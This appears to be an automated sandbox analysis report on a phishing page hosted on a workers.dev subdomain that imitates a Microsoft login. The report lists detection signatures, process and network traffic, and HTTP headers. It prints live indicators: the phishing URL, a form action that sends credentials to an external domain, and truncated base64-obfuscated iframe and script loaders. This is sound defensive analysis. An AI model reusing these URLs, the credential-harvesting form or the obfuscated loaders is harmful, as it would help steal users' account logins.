
Windows Analysis Report
https://e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev/&umid=ea64e973-4742-4a13-b7e6-f166cfb5aedf&auth=4c13a8eb8816953c02b02599c881676174c26b4b-2d2cb8f6bf763978670ab6e3d03aef460cd5c82c

Overview

General Information

Sample URL: https://e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev/&umid=ea64e973-4742-4a13-b7e6-f166cfb5aedf&auth=4c13a8eb8816953c02b02599c881676174c26b4b-2d2cb8f6bf763978670ab6e3d03aef460cd5c82c
Analysis ID: 1649488

Detection

HTMLPhisher
Score: 56
Range: 0 - 100
Confidence: 100%

Signatures

AI detected phishing page
Yara detected HtmlPhish54
Creates files inside the system directory
Deletes files inside the Windows folder
Form action URLs do not match main URL
HTML body contains low number of good links
HTML page contains hidden javascript code
HTML page contains obfuscated script src
Uses insecure TLS / SSL version for HTTPS connection

Classification

Classification legend (report widget): Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner; verdict scale: clean, suspicious, malicious

  • System is w10x64_ra
  • chrome.exe (PID: 6244 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 6472 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1976,i,3110005224580043279,10307581202711868803,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2244 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • chrome.exe (PID: 5848 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev/&umid=ea64e973-4742-4a13-b7e6-f166cfb5aedf&auth=4c13a8eb8816953c02b02599c881676174c26b4b-2d2cb8f6bf763978670ab6e3d03aef460cd5c82c" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup
Source | Rule | Description | Author | Strings
0.5..script.csv | JoeSecurity_HtmlPhish_54 | Yara detected HtmlPhish_54 | Joe Security |
0.7.pages.csv | JoeSecurity_HtmlPhish_54 | Yara detected HtmlPhish_54 | Joe Security |

No Sigma rule has matched
No Suricata rule has matched

Phishing

Source: https://e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev/&umid=ea64e973-4742-4a13-b7e6-f166cfb5aedf&auth=4c13a8eb8816953c02b02599c881676174c26b4b-2d2cb8f6bf763978670ab6e3d03aef460cd5c82c | Joe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is classified as 'wellknown'., The legitimate domain for Microsoft is 'microsoft.com'., The provided URL 'e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev' does not match the legitimate domain., The URL uses a Cloudflare Workers subdomain, which is a common tactic for hosting phishing sites., The URL contains random alphanumeric strings, which is suspicious and not typical for legitimate Microsoft URLs., The presence of input fields for 'Email, phone, or Skype' is consistent with phishing attempts targeting Microsoft accounts. DOM: 0.7.pages.csv
Source: https://e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev/&umid=ea64e973-4742-4a13-b7e6-f166cfb5aedf&auth=4c13a8eb8816953c02b02599c881676174c26b4b-2d2cb8f6bf763978670ab6e3d03aef460cd5c82c | Joe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is classified as 'wellknown'., The URL 'e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev' does not match the legitimate domain 'microsoft.com'., The domain 'workers.dev' is a generic domain often used for cloud services, which can be legitimate but is not directly associated with Microsoft., The subdomain and path structure 'e23a311b.5f438d8b1fa34021ffea2c2f' are suspicious and do not resemble any known Microsoft subdomains., The presence of input fields for 'Email, phone, or Skype' is typical for Microsoft services, but given the URL, it raises suspicion of phishing. DOM: 0.8.pages.csv
Source: Yara match | File source: 0.5..script.csv, type: HTML
Source: Yara match | File source: 0.7.pages.csv, type: HTML
Source: https://e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev/&umid=ea64e973-4742-4a13-b7e6-f166cfb5aedf&auth=4c13a8eb8816953c02b02599c881676174c26b4b-2d2cb8f6bf763978670ab6e3d03aef460cd5c82c | HTTP Parser: Form action: https://dovermhainstrim.icu/common/login workers dovermhainstrim
Source: https://e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev/&umid=ea64e973-4742-4a13-b7e6-f166cfb5aedf&auth=4c13a8eb8816953c02b02599c881676174c26b4b-2d2cb8f6bf763978670ab6e3d03aef460cd5c82c | HTTP Parser: Number of links: 0
Source: https://e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev/&umid=ea64e973-4742-4a13-b7e6-f166cfb5aedf&auth=4c13a8eb8816953c02b02599c881676174c26b4b-2d2cb8f6bf763978670ab6e3d03aef460cd5c82c | HTTP Parser: Base64 decoded: <!doctype html><html><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"></head><body style="margin:0;padding:0"><iframe src="https://dovermhainstrim.icu/?sign=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodH...
Source: https://e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev/&umid=ea64e973-4742-4a13-b7e6-f166cfb5aedf&auth=4c13a8eb8816953c02b02599c881676174c26b4b-2d2cb8f6bf763978670ab6e3d03aef460cd5c82c | HTTP Parser: Script src: data:text/javascript;base64,ZnVuY3Rpb24gYygpe2lmKCFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuYiIpIHx8ICFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuZyIpKXtkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKE9iamVjdC5hc3NpZ24oZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgiZGl2Iikse2NsYXNzTGlzdDpbImIiXX
Source: https://e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev/&umid=ea64e973-4742-4a13-b7e6-f166cfb5aedf&auth=4c13a8eb8816953c02b02599c881676174c26b4b-2d2cb8f6bf763978670ab6e3d03aef460cd5c82c | HTTP Parser: Iframe src: https://portal.microsoftonline.com/Prefetch/Prefetch.aspx
Source: https://e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev/&umid=ea64e973-4742-4a13-b7e6-f166cfb5aedf&auth=4c13a8eb8816953c02b02599c881676174c26b4b-2d2cb8f6bf763978670ab6e3d03aef460cd5c82c | HTTP Parser: <input type="password" .../> found
Source: https://e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev/&umid=ea64e973-4742-4a13-b7e6-f166cfb5aedf&auth=4c13a8eb8816953c02b02599c881676174c26b4b-2d2cb8f6bf763978670ab6e3d03aef460cd5c82c | HTTP Parser: No favicon
Source: https://e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev/&umid=ea64e973-4742-4a13-b7e6-f166cfb5aedf&auth=4c13a8eb8816953c02b02599c881676174c26b4b-2d2cb8f6bf763978670ab6e3d03aef460cd5c82c | HTTP Parser: No favicon
Source: https://e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev/&umid=ea64e973-4742-4a13-b7e6-f166cfb5aedf&auth=4c13a8eb8816953c02b02599c881676174c26b4b-2d2cb8f6bf763978670ab6e3d03aef460cd5c82c | HTTP Parser: No favicon
Source: https://e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev/&umid=ea64e973-4742-4a13-b7e6-f166cfb5aedf&auth=4c13a8eb8816953c02b02599c881676174c26b4b-2d2cb8f6bf763978670ab6e3d03aef460cd5c82c | HTTP Parser: No favicon
Source: https://e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev/&umid=ea64e973-4742-4a13-b7e6-f166cfb5aedf&auth=4c13a8eb8816953c02b02599c881676174c26b4b-2d2cb8f6bf763978670ab6e3d03aef460cd5c82c | HTTP Parser: No favicon
Source: https://e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev/&umid=ea64e973-4742-4a13-b7e6-f166cfb5aedf&auth=4c13a8eb8816953c02b02599c881676174c26b4b-2d2cb8f6bf763978670ab6e3d03aef460cd5c82c | HTTP Parser: No favicon
Source: https://e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev/&umid=ea64e973-4742-4a13-b7e6-f166cfb5aedf&auth=4c13a8eb8816953c02b02599c881676174c26b4b-2d2cb8f6bf763978670ab6e3d03aef460cd5c82c | HTTP Parser: No favicon
Source: https://e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev/&umid=ea64e973-4742-4a13-b7e6-f166cfb5aedf&auth=4c13a8eb8816953c02b02599c881676174c26b4b-2d2cb8f6bf763978670ab6e3d03aef460cd5c82c | HTTP Parser: No favicon
Source: https://e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev/&umid=ea64e973-4742-4a13-b7e6-f166cfb5aedf&auth=4c13a8eb8816953c02b02599c881676174c26b4b-2d2cb8f6bf763978670ab6e3d03aef460cd5c82c | HTTP Parser: No <meta name="author".. found
Source: https://e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev/&umid=ea64e973-4742-4a13-b7e6-f166cfb5aedf&auth=4c13a8eb8816953c02b02599c881676174c26b4b-2d2cb8f6bf763978670ab6e3d03aef460cd5c82c | HTTP Parser: No <meta name="copyright".. found
Source: unknown | HTTPS traffic detected: 2.23.227.208:443 -> 192.168.2.16:49742 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 104.21.13.238:443 -> 192.168.2.16:49702 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.13.238:443 -> 192.168.2.16:49701 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.18.187.31:443 -> 192.168.2.16:49709 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.18.94.41:443 -> 192.168.2.16:49710 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.18.95.41:443 -> 192.168.2.16:49712 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.18.94.41:443 -> 192.168.2.16:49715 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.13.238:443 -> 192.168.2.16:49717 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 142.251.35.164:443 -> 192.168.2.16:49720 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 2.23.227.208:443 -> 192.168.2.16:49729 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 143.198.129.211:443 -> 192.168.2.16:49751 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 13.107.246.40:443 -> 192.168.2.16:49753 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.219.36.138:443 -> 192.168.2.16:49758 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 13.107.9.156:443 -> 192.168.2.16:49764 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 143.198.129.211:443 -> 192.168.2.16:49768 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 143.198.129.211:443 -> 192.168.2.16:49769 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 143.198.129.211:443 -> 192.168.2.16:49770 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 143.198.129.211:443 -> 192.168.2.16:49777 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 143.198.129.211:443 -> 192.168.2.16:49779 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 143.198.129.211:443 -> 192.168.2.16:49778 version: TLS 1.2
Source: chrome.exe | Memory has grown: Private usage: 10MB later: 39MB
Source: unknown | HTTPS traffic detected: 2.23.227.208:443 -> 192.168.2.16:49742 version: TLS 1.0
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown | TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown | TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown | TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown | TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown | TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown | TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown | TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown | TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown | TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown | TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown | TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown | TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown | TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown | TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown | TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown | TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown | TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown | TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown | TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown | TCP traffic detected without corresponding DNS query: 142.251.32.99
Source: unknown | TCP traffic detected without corresponding DNS query: 199.232.38.172
Source: unknown | TCP traffic detected without corresponding DNS query: 142.251.32.99
Source: unknown | TCP traffic detected without corresponding DNS query: 199.232.38.172
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected:
  GET /&umid=ea64e973-4742-4a13-b7e6-f166cfb5aedf&auth=4c13a8eb8816953c02b02599c881676174c26b4b-2d2cb8f6bf763978670ab6e3d03aef460cd5c82c HTTP/1.1
  Host: e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev
  Connection: keep-alive
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  sec-ch-ua-mobile: ?0
  sec-ch-ua-platform: "Windows"
  Upgrade-Insecure-Requests: 1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Sec-Fetch-Site: none
  Sec-Fetch-Mode: navigate
  Sec-Fetch-User: ?1
  Sec-Fetch-Dest: document
  Accept-Encoding: gzip, deflate, br, zstd
  Accept-Language: en-US,en;q=0.9

Source: global traffic | HTTP traffic detected:
  GET /gh/Joe12387/detectIncognito@main/dist/es5/detectIncognito.min.js HTTP/1.1
  Host: cdn.jsdelivr.net
  Connection: keep-alive
  sec-ch-ua-platform: "Windows"
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  sec-ch-ua-mobile: ?0
  Accept: */*
  Sec-Fetch-Site: cross-site
  Sec-Fetch-Mode: no-cors
  Sec-Fetch-Dest: script
  Sec-Fetch-Storage-Access: active
  Referer: https://e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev/
  Accept-Encoding: gzip, deflate, br, zstd
  Accept-Language: en-US,en;q=0.9

Source: global traffic | HTTP traffic detected:
  GET /turnstile/v0/api.js?onload=onloadTurnstileCallback HTTP/1.1
  Host: challenges.cloudflare.com
  Connection: keep-alive
  sec-ch-ua-platform: "Windows"
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  sec-ch-ua-mobile: ?0
  Accept: */*
  Sec-Fetch-Site: cross-site
  Sec-Fetch-Mode: no-cors
  Sec-Fetch-Dest: script
  Sec-Fetch-Storage-Access: active
  Referer: https://e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev/
  Accept-Encoding: gzip, deflate, br, zstd
  Accept-Language: en-US,en;q=0.9

Source: global traffic | HTTP traffic detected:
  GET /turnstile/v0/b/708f7a809116/api.js HTTP/1.1
  Host: challenges.cloudflare.com
  Connection: keep-alive
  sec-ch-ua-platform: "Windows"
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  sec-ch-ua-mobile: ?0
  Accept: */*
  Sec-Fetch-Site: cross-site
  Sec-Fetch-Mode: no-cors
  Sec-Fetch-Dest: script
  Sec-Fetch-Storage-Access: active
  Referer: https://e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev/
  Accept-Encoding: gzip, deflate, br, zstd
  Accept-Language: en-US,en;q=0.9

Source: global traffic | HTTP traffic detected:
  GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/n74pt/0x4AAAAAABCn2aXTjicCpvuc/auto/fbE/new/normal/auto/ HTTP/1.1
  Host: challenges.cloudflare.com
  Connection: keep-alive
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  sec-ch-ua-mobile: ?0
  sec-ch-ua-platform: "Windows"
  Upgrade-Insecure-Requests: 1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Sec-Fetch-Site: cross-site
  Sec-Fetch-Mode: navigate
  Sec-Fetch-Dest: iframe
  Sec-Fetch-Storage-Access: active
  Referer: https://e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev/
  Accept-Encoding: gzip, deflate, br, zstd
  Accept-Language: en-US,en;q=0.9

Source: global traffic | HTTP traffic detected:
  GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=92690b6b4f3ea0f4&lang=auto HTTP/1.1
  Host: challenges.cloudflare.com
  Connection: keep-alive
  sec-ch-ua-platform: "Windows"
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  sec-ch-ua-mobile: ?0
  Accept: */*
  Sec-Fetch-Site: same-origin
  Sec-Fetch-Mode: no-cors
  Sec-Fetch-Dest: script
  Sec-Fetch-Storage-Access: active
  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/n74pt/0x4AAAAAABCn2aXTjicCpvuc/auto/fbE/new/normal/auto/
  Accept-Encoding: gzip, deflate, br, zstd
  Accept-Language: en-US,en;q=0.9

Source: global traffic | HTTP traffic detected:
  GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
  Host: challenges.cloudflare.com
  Connection: keep-alive
  sec-ch-ua-platform: "Windows"
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  sec-ch-ua-mobile: ?0
  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
  Sec-Fetch-Site: same-origin
  Sec-Fetch-Mode: no-cors
  Sec-Fetch-Dest: image
  Sec-Fetch-Storage-Access: active
  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/n74pt/0x4AAAAAABCn2aXTjicCpvuc/auto/fbE/new/normal/auto/
  Accept-Encoding: gzip, deflate, br, zstd
  Accept-Language: en-US,en;q=0.9

Source: global traffic | HTTP traffic detected:
  GET /favicon.ico HTTP/1.1
  Host: e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev
  Connection: keep-alive
  sec-ch-ua-platform: "Windows"
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  sec-ch-ua-mobile: ?0
  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
  Sec-Fetch-Site: same-origin
  Sec-Fetch-Mode: no-cors
  Sec-Fetch-Dest: image
  Referer: https://e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev/&umid=ea64e973-4742-4a13-b7e6-f166cfb5aedf&auth=4c13a8eb8816953c02b02599c881676174c26b4b-2d2cb8f6bf763978670ab6e3d03aef460cd5c82c
  Accept-Encoding: gzip, deflate, br, zstd
  Accept-Language: en-US,en;q=0.9

Source: global traffic | HTTP traffic detected:
  GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
  Host: challenges.cloudflare.com
  Connection: keep-alive
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  Accept: */*
  Sec-Fetch-Site: none
  Sec-Fetch-Mode: cors
  Sec-Fetch-Dest: empty
  Sec-Fetch-Storage-Access: active
  Accept-Encoding: gzip, deflate, br, zstd
  Accept-Language: en-US,en;q=0.9

Source: global traffic | HTTP traffic detected:
  GET /favicon.ico HTTP/1.1
  Host: e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev
  Connection: keep-alive
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  Accept: */*
  Sec-Fetch-Site: none
  Sec-Fetch-Mode: cors
  Sec-Fetch-Dest: empty
  Sec-Fetch-Storage-Access: active
  Accept-Encoding: gzip, deflate, br, zstd
  Accept-Language: en-US,en;q=0.9

Source: global traffic | HTTP traffic detected:
  GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1919245856:1743013575:nXXmh0HbrHlQXpy4m6h5G9OJr9O9QhmryX8dJ0tI8rA/92690b6b4f3ea0f4/SI2OlB0D9.xPaJ8PeD3gTYOjfN8pF9UL6rRfejF24mg-1743017238-1.1.1.1-tcSKqP5HF769OqdkR4FoX5VopIdLNxdgvM8DJn0Ff7mTPcQhDmyZDxZvGHdown3W HTTP/1.1
  Host: challenges.cloudflare.com
  Connection: keep-alive
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  Accept: */*
  Sec-Fetch-Site: none
  Sec-Fetch-Mode: cors
  Sec-Fetch-Dest: empty
  Sec-Fetch-Storage-Access: active
  Accept-Encoding: gzip, deflate, br, zstd
  Accept-Language: en-US,en;q=0.9

Source: global traffic | HTTP traffic detected:
  GET /cdn-cgi/challenge-platform/h/b/pat/92690b6b4f3ea0f4/1743017239427/b11b001df3e4df6e56c55deecaddd5320f067bee9f1e79c065e3a3abebc4451a/Lba_3YOgfFBLE2t HTTP/1.1
  Host: challenges.cloudflare.com
  Connection: keep-alive
  Cache-Control: max-age=0
  sec-ch-ua-platform: "Windows"
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  sec-ch-ua-mobile: ?0
  Accept: */*
  Sec-Fetch-Site: same-origin
  Sec-Fetch-Mode: cors
  Sec-Fetch-Dest: empty
  Sec-Fetch-Storage-Access: active
  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/n74pt/0x4AAAAAABCn2aXTjicCpvuc/auto/fbE/new/normal/auto/
  Accept-Encoding: gzip, deflate, br, zstd
  Accept-Language: en-US,en;q=0.9

Source: global traffic | HTTP traffic detected:
  GET /cdn-cgi/challenge-platform/h/b/d/92690b6b4f3ea0f4/1743017239432/udH6orPBiQK-Aio HTTP/1.1
  Host: challenges.cloudflare.com
  Connection: keep-alive
  sec-ch-ua-platform: "Windows"
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  sec-ch-ua-mobile: ?0
  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
  Sec-Fetch-Site: same-origin
  Sec-Fetch-Mode: no-cors
  Sec-Fetch-Dest: image
  Sec-Fetch-Storage-Access: active
  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/n74pt/0x4AAAAAABCn2aXTjicCpvuc/auto/fbE/new/normal/auto/
  Accept-Encoding: gzip, deflate, br, zstd
  Accept-Language: en-US,en;q=0.9

Source: global traffic | HTTP traffic detected:
  GET /cdn-cgi/challenge-platform/h/b/d/92690b6b4f3ea0f4/1743017239432/udH6orPBiQK-Aio HTTP/1.1
  Host: challenges.cloudflare.com
  Connection: keep-alive
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  Accept: */*
  Sec-Fetch-Site: none
  Sec-Fetch-Mode: cors
  Sec-Fetch-Dest: empty
  Sec-Fetch-Storage-Access: active
  Accept-Encoding: gzip, deflate, br, zstd
  Accept-Language: en-US,en;q=0.9

Source: global traffic | HTTP traffic detected:
  GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1919245856:1743013575:nXXmh0HbrHlQXpy4m6h5G9OJr9O9QhmryX8dJ0tI8rA/92690b6b4f3ea0f4/SI2OlB0D9.xPaJ8PeD3gTYOjfN8pF9UL6rRfejF24mg-1743017238-1.1.1.1-tcSKqP5HF769OqdkR4FoX5VopIdLNxdgvM8DJn0Ff7mTPcQhDmyZDxZvGHdown3W HTTP/1.1
  Host: challenges.cloudflare.com
  Connection: keep-alive
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  Accept: */*
  Sec-Fetch-Site: none
  Sec-Fetch-Mode: cors
  Sec-Fetch-Dest: empty
  Sec-Fetch-Storage-Access: active
  Accept-Encoding: gzip, deflate, br, zstd
  Accept-Language: en-US,en;q=0.9

Source: global traffic | HTTP traffic detected:
  GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1919245856:1743013575:nXXmh0HbrHlQXpy4m6h5G9OJr9O9QhmryX8dJ0tI8rA/92690b6b4f3ea0f4/SI2OlB0D9.xPaJ8PeD3gTYOjfN8pF9UL6rRfejF24mg-1743017238-1.1.1.1-tcSKqP5HF769OqdkR4FoX5VopIdLNxdgvM8DJn0Ff7mTPcQhDmyZDxZvGHdown3W HTTP/1.1
  Host: challenges.cloudflare.com
  Connection: keep-alive
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  Accept: */*
  Sec-Fetch-Site: none
  Sec-Fetch-Mode: cors
  Sec-Fetch-Dest: empty
  Sec-Fetch-Storage-Access: active
  Accept-Encoding: gzip, deflate, br, zstd
  Accept-Language: en-US,en;q=0.9

Source: global traffic | HTTP traffic detected:
